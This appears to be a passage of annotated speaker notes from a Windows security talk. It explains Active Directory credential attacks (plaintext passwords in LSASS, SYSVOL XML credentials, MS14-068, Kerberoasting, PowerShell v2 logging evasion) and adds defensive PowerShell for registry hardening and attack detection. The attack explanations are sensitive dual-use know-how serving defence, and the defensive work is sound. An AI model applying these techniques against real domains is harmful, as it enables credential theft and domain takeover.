8. His first blog on this subject is cleverly titled "Pass the pass(word)". In this blog, he discusses the fact that Windows Vista and higher feature a Security Support Provider (SSP) for Terminal Services named TsPkg, which provides single sign-on functionality to terminal servers. This feature can also be added to Windows XP SP3, as discussed here. Furthermore, this TechNet article discusses how to enable this SSO feature for specified terminal servers via GPO. However, as the author of the tool stated in his blog, and as my testing confirms, Windows will store the password in memory whether this feature is "enabled" via GPO or not. In other words, by default it's always on. A few weeks later, the author posted an update titled "Re-pass the pass(word)", where he discusses another SSP providing similar SSO capability, named WDigest. This time it's not only in Vista and higher, but in XP and Server 2003 also! WDigest provides for "digest access authentication", an extension to HTTP specified by RFC 2069 and later in RFC 2617. Digest access authentication improves upon basic access authentication, which sends credentials in the clear. WDigest specifically supports RFC 2617, as well as RFC 2831, which is a more generic authentication mechanism (useful beyond HTTP) called Simple Authentication and Security Layer (SASL). The general idea here is that these specifications provide challenge-response authentication, whereby a challenge is issued and the responding party answers the challenge using a hashing routine that takes the clear-text password as an input. On the other hand, there will obviously be one or more trusted machines for which you will need to perform an interactive logon. For those machines, I suggest you remove the TsPkg and WDigest SSPs to avoid a blatant security risk. Update: Removing SSPs is no longer valid advice since Kerberos also stores the password. Therefore, the most effective protection is to avoid interactive logons to any untrusted hosts. Other solutions such as one-time-passwords should also be considered.
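An audit-and-remediate check for two registry conditions raised in notes 4 and 8, added here and not part of the deck: the AlwaysInstallElevated value in both hives (MSI-as-SYSTEM needs both set to 1) and the WDigest UseLogonCredential value, the supported alternative to removing the SSP that the update in note 8 warns against (a setting the deck itself does not mention; key and value names are as Microsoft documents them). -Fix is opt-in; the function name is my own.

```powershell
# Added example, not from the deck. Run elevated; call with -Fix to write the safe values.
function Test-CredentialHardening {
    param([switch]$Fix)
    $checks = @(
        @{ Name = 'AlwaysInstallElevated (HKLM)'; Value = 'AlwaysInstallElevated'; Safe = 0
           Key  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' },
        @{ Name = 'AlwaysInstallElevated (HKCU)'; Value = 'AlwaysInstallElevated'; Safe = 0
           Key  = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' },
        @{ Name = 'WDigest UseLogonCredential';   Value = 'UseLogonCredential';    Safe = 0
           Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' }
    )
    foreach ($c in $checks) {
        $current = (Get-ItemProperty -Path $c.Key -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
        # An absent AlwaysInstallElevated means the feature is off (safe). An absent
        # UseLogonCredential means the OS default applies, which on Windows 7 / 2008 R2 still
        # keeps plaintext in LSASS, so we require it to be explicitly 0.
        $unsafe = if ($null -eq $current) { $c.Value -eq 'UseLogonCredential' } else { $current -ne $c.Safe }
        if ($unsafe -and $Fix) {
            if (-not (Test-Path $c.Key)) { New-Item -Path $c.Key -Force | Out-Null }
            New-ItemProperty -Path $c.Key -Name $c.Value -Value $c.Safe -PropertyType DWord -Force | Out-Null
        }
        [pscustomobject]@{
            Check   = $c.Name
            Current = $current
            Unsafe  = $unsafe
            Fixed   = [bool]($unsafe -and $Fix)
        }
    }
}
```

Setting UseLogonCredential to 0 only affects logons created after the change; sessions already on the box keep their cached secrets until they log off.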
9. This method is the simplest since no special “hacking” tool is required. All the attacker has to do is open up Windows Explorer and search the domain SYSVOL DFS share for XML files. Most of the time, the following XML files will contain credentials: groups.xml, scheduledtasks.xml, & Services.xml.

   Put simply, exploiting MS14-068 takes less than 5 minutes and enables an attacker to effectively re-write a valid Kerberos TGT authentication ticket to make them a Domain Admin (and Enterprise Admin). As shown in the above graphic, this is like taking a valid boarding pass and, before boarding, writing “pilot” on it. Then while boarding the plane, you are escorted to the cockpit and asked if you would like coffee before taking off.

   This attack involves requesting Kerberos service ticket(s) (TGS) for the Service Principal Name (SPN) of the target service account. This request uses a valid domain user’s authentication ticket (TGT) to request one or several service tickets for a target service running on a server. The Domain Controller doesn’t track whether the user ever actually connects to these resources (or even whether the user has access). The Domain Controller looks up the SPN in Active Directory and encrypts the ticket using the service account associated with the SPN in order for the service to validate user access. The encryption type of the requested Kerberos service ticket is RC4_HMAC_MD5, which means the service account’s NTLM password hash is used to encrypt the service ticket. This means that Kerberoast can attempt to open the Kerberos ticket by trying different NTLM hashes, and when the ticket is successfully opened, the correct service account password is discovered. Note: No elevated rights are required to get the service tickets and no traffic is sent to the target.
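Detection logic for the Kerberoast behaviour this note describes, added here and not part of the deck: on a domain controller, Event ID 4769 records every service ticket request, including the encryption type (0x17 is RC4-HMAC, the type the note says the attack relies on) and the SPN. One account pulling RC4 tickets for many distinct, non-computer SPNs in a short window is the pattern to alert on. The function name and the threshold default are my own choices.

```powershell
# Added example, not from the deck. Run against a DC's Security log (needs Event Log Readers or admin).
function Find-KerberoastCandidates {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # assumption: this is a domain controller
        [int]$Hours = 24,
        [int]$MinDistinctServices = 5                 # assumed threshold; tune to your environment
    )
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue
    $rows = foreach ($e in $events) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d.TicketEncryptionType -ne '0x17') { continue }            # RC4-HMAC only (AES tickets are not crackable this way)
        if ($d.ServiceName -like '*$' -or $d.ServiceName -eq 'krbtgt') { continue }  # skip computer accounts and the TGT service
        if ($d.Status -ne '0x0') { continue }                           # successful issuance only
        [pscustomobject]@{
            Time    = $e.TimeCreated
            Account = $d.TargetUserName
            Client  = $d.IpAddress
            Service = $d.ServiceName
        }
    }
    # Group by requesting account; many different SPNs from one account is the Kerberoast signature.
    $rows | Group-Object Account | Where-Object {
        ($_.Group.Service | Sort-Object -Unique).Count -ge $MinDistinctServices
    } | ForEach-Object {
        [pscustomobject]@{
            Account          = $_.Name
            DistinctServices = ($_.Group.Service | Sort-Object -Unique).Count
            Clients          = (($_.Group.Client | Sort-Object -Unique) -join ',')
            FirstSeen        = ($_.Group.Time | Measure-Object -Minimum).Minimum
            LastSeen         = ($_.Group.Time | Measure-Object -Maximum).Maximum
        }
    }
}
```

Service accounts whose SPNs legitimately only support RC4 will show up as tickets but not as candidates unless one client requests many of them; moving those accounts to AES-only removes the RC4 tickets the attack needs in the first place.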
10. PS>Attack is a self-contained custom PowerShell console which includes many offensive PowerShell tools and calls PowerShell (System.Management.Automation.dll) through .NET. The PowerShell attack tools are encrypted (AV evasion) and decrypted to memory at run-time. There’s also a custom build tool for ensuring every built exe is different (AV bypass). PS>Attack is simply one method by which an attacker can leverage offensive PowerShell tools without running PowerShell itself. Separately, PowerShell code can be made to run in the earlier version of the PowerShell engine, if available. This means that if a system has PowerShell v2 (Windows 7 & Windows Server 2008 R2), then any PowerShell code executed under it is not logged, even if PowerShell v5 is installed with system-wide transcript or script block logging. Windows 10 provides the ability to remove PowerShell v2.0 (no, this doesn’t remove PowerShell). Once PowerShell v2 is removed from Windows 10, PS>Attack usage is clearly logged.
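Closing the v2 engine gap from this note and finding out whether it has already been used, as an added example that is not part of the deck: the optional feature MicrosoftWindowsPowerShellV2Root is what Windows 10 lets you remove, and every engine start writes Event ID 400 to the classic "Windows PowerShell" log with an EngineVersion line, so v2 starts are visible even though the v5 script block and transcript logging did not cover them. Function names are my own.

```powershell
# Added example, not from the deck. Windows 10 / Server 2016+; the feature cmdlets need an elevated prompt.
function Get-PowerShellV2State {
    # True when the v2 engine is still installed and can be selected with "-Version 2".
    $root = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
    [pscustomobject]@{ Computer = $env:COMPUTERNAME; V2Installed = ($root.State -eq 'Enabled') }
}

function Disable-PowerShellV2 {
    # Removes only the v2 engine; PowerShell v5 stays in place (as the note says).
    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
}

function Find-PowerShellV2Starts {
    # Event 400 ("Engine state is changed from None to Available") is written by every engine
    # version, including v2, so a downgrade leaves this trace even when 4104 logging is blind to it.
    param([int]$Days = 30)
    $filter = @{ LogName = 'Windows PowerShell'; Id = 400; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        ForEach-Object {
            # HostApplication shows the command line that started the engine, e.g. powershell.exe -Version 2
            $app = if ($_.Message -match 'HostApplication=(.+)') { $Matches[1].Trim() } else { '' }
            [pscustomobject]@{ Time = $_.TimeCreated; HostApplication = $app }
        }
}
```

The third function is the one worth scheduling on Windows 7 / 2008 R2 hosts, where v2 cannot be removed and the only option is to notice when it is used.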